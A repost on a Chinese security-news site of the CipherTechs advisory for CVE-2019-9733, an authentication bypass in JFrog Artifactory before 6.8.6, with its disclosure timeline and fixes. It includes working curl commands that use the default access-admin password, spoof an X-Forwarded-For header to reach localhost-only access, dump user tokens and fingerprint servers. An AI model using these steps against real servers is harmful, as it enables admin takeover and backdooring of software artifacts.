微慑信息网

JFrog Artifactory Administrator Authentication Bypass

Artifactory是一款二进制存储管理工具,用来管理构建构建工具(如:gradle)等所依赖的二进制仓库,以方便管理第三方库和发布目标版本库,从而提高软件开发效率。它提供大量的插件以利于和不同工具之间的整合,内部使用权限管理更加安全,并支持高并发等等特性

在JFrog Artifactory6.7.3中发现了一个问题。

默认情况下,访问管理帐户用于重置管理帐户的密码,以防管理员从工件控制台中被锁定。

这仅允许从本地主机直接连接,但向请求提供X-Forwarded-for-HTTP头允许未经身份验证的用户在绕过允许的IP地址白名单时使用访问管理帐户的默认凭据登录。访问管理帐户可以使用Artifactory的API为所有用户(包括管理帐户)请求身份验证令牌,并反过来完全控制Artifactory管理的所有项目和存储库。

 

   CipherTechs Inc - Security Advisory
           
JFrog Artifactory Administrator Authentication Bypass 


Introduction
============
JFrog Artifactory (https://jfrog.com/artifactory/) is a popular universal artifact repository manager commonly used by software developers. CipherTechs' Red Team discovered a high risk vulnerability that allows unauthenticated remote attackers to obtain administrative access to Artifactory servers and assume control of all stored artifacts and builds. 


CVE
====
CVE-2019-9733


Affected Platforms and Versions
===============================
Product: JFrog Artifactory
Version: < 6.8.6


Vulnerability Overview
======================
Security risk: Critical
Attack vector: Remote
Vendor Status: Fixed in version 6.8.6 released March 12, 2019
https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6


Vulnerability Description
=========================
Artifactory has an account that can be used to reset the admin account password from localhost. 

By providing the HTTP header ‘X-Forwarded-For’ it is possible to bypass Artifactory’s whitelist allowed_ips.

Accessing the internal "password reset" admin account exposes the primary admin account's access token allowing an attacker to obtain admin access to the Artifactory server without disrupting other users' access.

This vulnerability is exploitable in most configurations including when an external SSO provider such as Okta or Onelogin is used.


Technical details
=================

Artifactory’s documentation [1] states that a default account, access-admin, is present and can be used to reset the admin user’s password. CipherTechs used curl to see if the access-admin account was present and had the default password of password.

$ curl -ks -u access-admin:password https://artifactory.lan/artifactory/api/access/api/v1/users/ {
  "errors" : [ {
    "code" : "FORBIDDEN",
    "message" : "User 'access-admin' is not allowed to login from remote address: [IP REDACTED]"
  } ]
}

The error message shows that the credential access-admin:password is valid, but not allowed to login remotely. CipherTechs bypassed this measure by providing a X-Forwarded-For HTTP header and set it to 127.0.0.1 (localhost).

$ curl -ks -H 'X-Forwarded-For: 127.0.0.1' -u access-admin:password https://artifactory.lan/artifactory/api/access/api/v1/users/  | jq .
{
  "users": [
    {
      "username": "access-admin",
      "realm": "internal",
      "status": "enabled",
      "allowed_ips": [
        "127.0.0.1"
      ],
      "created": "2019-01-19T20:00:40.327Z",
      "modified": "2019-02-14T15:55:41.052Z",
      "last_login_time": "1970-01-01T00:00:00.000Z",
      "custom_data": {},
      "password_expired": false,
      "password_last_modified": 1518623741047,
      "groups": []
    },
    {
      "username": "admin",
      "realm": "internal",
      "status": "enabled",
      "allowed_ips": [
        "*"
      ],
      "created": "2019-01-19T20:01:09.806Z",
      "modified": "2019-02-14T15:38:54.481Z",
      "last_login_time": "2019-02-20T11:53:57.973Z",
      "last_login_ip": "[REDACTED]",
      "custom_data": {
        "public_key": "[REDACTED]",
        "updatable_profile": "true",
        "basictoken_shash": "[REDACTED]",
        "private_key": "[REDACTED]",
        "artifactory_admin": "true",
        "basictoken": "[REDACTED]"
      },
      "password_expired": false,
      "password_last_modified": 1518623741101,
      "groups": []

[ CIPHERTECHS: LONG RESPONSE REMOVED FOR BREVITY. All users, keys, and tokens are returned]

 
Once authenticated as admin, the full rich Artifactory API was available [2] and yielded sensitive details. For example, the following request retrieves all builds.

$ curl -H"Authorization: Bearer $basictoken_value" -ks https://artifactory.lan/artifactory/api/builds/

The admin account has rights to publish artifacts and can overwrite existing files, making it possible for an attacker to backdoor existing artifacts that current and future builds depend on and giving persistent access across all environments and developer workstations.

Artifactory servers can be discovered by requesting the URI /artifactory/webapp/ and looking for the X-Artifactory-Id HTTP response header.

$ curl -I https://artifactory.lan/artifactory/webapp/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-store,max-age=0
Cache-control: no-cache="set-cookie"
Content-Length: 2239
Content-Type: text/html
Date: Mon, 23 Feb 2019 17:24:08 GMT
ETag: W/"2239-1549437200000"
Last-Modified: Wed, 06 Feb 2019 07:13:20 GMT
Server: Artifactory/6.7.3
X-Artifactory-Id: d9b50a320385a5e306762e0c0a88ad4f6fe1527b
X-Artifactory-Node-Id: artifactory-node-1
X-FRAME-OPTIONS: DENY
Connection: keep-alive


Recommendations
===============
Upgrade to JFrog Artifactory 6.8.6 or higher. 

Change the default access-admin password. 

Block external access to /api.

Review Artifactory logs for previous API use and any signs of access from unauthorized IP addresses.

Revoke basic tokens for all users. The example command below will revoke the basic token for the access-admin account.
curl -H "Content-Type: application/json+merge-patch" -XPATCH -uaccess-admin --data '{"username":"admin","custom_data":{"basictoken_shash":{"value":"REDACTED","sensitive":false},"basictoken":{"value":"","sensitive":true}}}' https://artifactory.lan/artifactory/api/v1/users/admin




Timeline
=========
2019.02.25 - Vulnerability discovered by CipherTechs
2019.02.28 - JFrog notified 
2019.02.29 - JFrog provided interim fix for CipherTechs' client and began working on a patch.
2019.03.12 - Fixed version of Artifactory published at https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6
2019.03.21 - Public disclosure


Credits
=======
CipherTechs Red Team

CipherTechs would like to thank JFrog for their professional response to this vulnerability disclosure.


References:
[1] https://www.jfrog.com/confluence/display/RTF/Managing+Users
[2] https://www.jfrog.com/confluence/display/RTF/Artifactory+REST+API

The contents of this advisory are Copyright(c) 2019 CipherTechs Inc.


=====================================================================================

About CipherTechs

CipherTechs is a global Cyber Security service provider founded in 2001 that remains privately held with headquarters in New York City. CipherTechs is exclusively focused on cyber security and provide a full service solution portfolio. We service our customers through the following main practice areas: Offensive Security, Defensive Security, MSSP and SOC, Audit and Compliance, Training and Product Procurement.

 

参考:

http://packetstormsecurity.com/files/152172/JFrog-Artifactory-Administrator-Authentication-Bypass.htmlhttps://www.ciphertechs.com/jfrog-artifactory-advisory/https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » JFrog Artifactory Administrator Authentication Bypass

评论 抢沙发

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册